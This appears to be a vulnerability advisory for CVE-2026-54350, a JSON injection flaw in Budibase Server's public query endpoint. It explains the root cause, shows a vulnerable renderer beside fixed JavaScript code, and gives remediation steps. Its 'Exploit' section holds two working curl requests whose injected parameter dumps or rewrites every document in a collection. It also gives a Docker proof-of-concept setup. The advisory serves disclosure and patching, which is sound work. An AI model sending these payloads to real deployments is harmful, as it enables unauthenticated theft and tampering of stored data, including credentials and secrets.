How CVE-2026-54350 Works
CVE-2026-54350 is a critical unauthenticated JSON injection vulnerability affecting Budibase Server versions up to and including 3.39.0. The root cause lies in the way user-supplied parameters are substituted into the raw JSON body of a query before being passed to JSON.parse(). The validation routine `validateQueryInputs` only checks for Handlebars markers ({{ and }}) and does not escape JSON metacharacters such as quotes ("), backslashes (\), or braces (}). This allows an attacker to supply a parameter value that closes the original JSON structure and injects additional keys into the parsed filter object.
For MongoDB queries, the parsed filter is passed directly to `collection.find()` without any key prefix or operator allow-list. By injecting a duplicate key like "name": {"$exists": true}, the attacker overrides the builder’s intended filter (e.g., {name: "..."}) and causes the query to return every document in the collection. The same technique works against `updateMany` queries, widening the filter scope to the entire collection while the builder-controlled `$set` body executes against all matched documents.
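The substitution flaw described above, shown as an added example beside two defensive fixes. This is illustrative code, not Budibase's own; the template syntax, the sample query body and the function names (`vulnerableRender`, `safeRender`, `containsOperatorKey`) are assumptions.

```javascript
// Constructed builder query and constructed injected parameter value (not from Budibase).
const SAMPLE_BODY = '{"name":"{{ name }}"}';
const SAMPLE_PARAM = 'x","name":{"$exists":true},"$comment":"audit';

// Vulnerable pattern: substitute the raw parameter into the JSON text, then JSON.parse().
// Only Handlebars markers are rejected, so quotes, backslashes and braces pass through.
function vulnerableRender(body, params) {
  const rendered = body.replace(/\{\{\s*(\w+)\s*\}\}/g, (_, key) => {
    const value = String(params[key] ?? "");
    if (value.includes("{{") || value.includes("}}")) {
      throw new Error("template markers not allowed");
    }
    return value;
  });
  return JSON.parse(rendered); // with duplicate keys, the last occurrence wins
}

// Fix 1: parse the template first, then substitute into the parsed object.
// A parameter can only ever become a string value, never new keys or operators.
// (Only string values that are exactly one placeholder are substituted here.)
function safeRender(body, params) {
  const walk = (node) => {
    if (typeof node === "string") {
      const m = node.match(/^\{\{\s*(\w+)\s*\}\}$/);
      return m ? String(params[m[1]] ?? "") : node;
    }
    if (Array.isArray(node)) return node.map(walk);
    if (node && typeof node === "object") {
      return Object.fromEntries(Object.entries(node).map(([k, v]) => [k, walk(v)]));
    }
    return node;
  };
  return walk(JSON.parse(body));
}

// Fix 2 (defence in depth): refuse a filter containing operator keys ("$...") at any
// depth before it reaches collection.find() / updateMany(), since the builder's own
// template never needs them for a plain equality lookup.
function containsOperatorKey(filter) {
  if (Array.isArray(filter)) return filter.some(containsOperatorKey);
  if (filter && typeof filter === "object") {
    return Object.entries(filter).some(
      ([k, v]) => k.startsWith("$") || containsOperatorKey(v)
    );
  }
  return false;
}
```

Run against the constructed input, `vulnerableRender` yields a filter whose `name` key is `{"$exists":true}`, while `safeRender` keeps the whole injected string as the literal name value.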
The `authorized` middleware short-circuits authentication and CSRF checks when a query’s role is set to PUBLIC. The endpoint `POST /api/v2/queries/:queryId` accepts calls with no session, requiring only the `x-budibase-app-id` header, which is publicly available from the published app URL. Consequently, an unauthenticated visitor of any published Budibase app can read every document from the backing MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or REST-with-JSON-body collection. If the builder has published a `PUBLIC` write query, the attacker can also modify every document in that collection with a single HTTP request.
SQL datasources (Postgres, MySQL, MSSQL, Oracle, MariaDB) are not affected because they use bind-parameterised interpolation. The vulnerability is reachable on any deployment where a workspace builder has set a non-SQL query to `PUBLIC` and published the app, a common low-code public-form use case.
DailyCVE Form:
Platform: Budibase Server
Version: <= 3.39.0
Vulnerability: JSON Injection
Severity: Critical
Date: 2026-05-20
Prediction: Patch 2026-06-23
What Undercode Say (Analytics)
- Affected Component: `@budibase/server` package
- Fixed Version: 3.39.12
- Attack Vector: Remote, unauthenticated
- Prerequisites: Published app with PUBLIC non-SQL query
- CWE: Improper Neutralization of Special Elements used in a JSON Input (CWE-116)
- Exploit Complexity: Low – one HTTP request
Exploit
- Read all documents via a PUBLIC read query:
curl -X POST "https://<budibase-host>/api/v2/queries/<read-queryId>" \
  -H "x-budibase-app-id: <published-appId>" \
  -H "Content-Type: application/json" \
  -d '{"parameters":{"name":"x\",\"name\":{\"$exists\":true},\"$comment\":\"audit"}}'
Expected response: all documents from the collection, including sensitive fields such as `password_hash`, `secret`, `api_token`, `mfa_secret`.
- Modify all documents via a PUBLIC updateMany query:
curl -X POST "https://<budibase-host>/api/v2/queries/<updateMany-queryId>" \
  -H "x-budibase-app-id: <published-appId>" \
  -H "Content-Type: application/json" \
  -d '{"parameters":{"name":"x\",\"name\":{\"$exists\":true},\"$comment\":\"esc"}}'
Expected response: `{"matchedCount": N, "modifiedCount": N}` where `N` is the total number of documents in the collection.
PoC Setup (Docker):
docker run -d --name budibase -p 10000:80 budibase/budibase:latest
Builder creates MongoDB datasource, PUBLIC query GetUserByName with body {"name":"{{ name }}"}
Anonymous attacker sends the above curl to read all documents
Protection
- Upgrade `@budibase/server` to 3.39.12 or later.
- Rotate any exposed credentials: reset user passwords (`password_hash`), rotate API tokens (`api_token`), reset stored secrets (`secret`) and MFA secrets (`mfa_secret`), rotate database/service credentials, and invalidate existing sessions/tokens.
- Avoid setting non-SQL queries to the `PUBLIC` role unless absolutely necessary; restrict public query exposure.
- Implement additional network-layer access controls to limit who can reach the `/api/v2/queries/` endpoints.
Impact
- Unauthenticated Data Exfiltration: An attacker can read every document from any backing MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or REST-with-JSON-body collection reachable through a PUBLIC query, including columns the published query was not designed to return (e.g., `password_hash`, `secret`, `api_token`, `mfa_secret`).
- Unauthenticated Data Manipulation: If the builder has published a PUBLIC `update`, `delete`, or `aggregate` query, the attacker can modify or delete every document in that collection, far beyond the builder's intended single-document scope.
- One HTTP Request, No Session, No CSRF: The attack requires no user interaction, no session cookie, and bypasses CSRF protections, making it trivially exploitable.
- Widespread Reach: Any Budibase deployment with a published app using a PUBLIC non-SQL query is vulnerable – this is the canonical low-code public-form use case.
Sources:
Reported By: github.com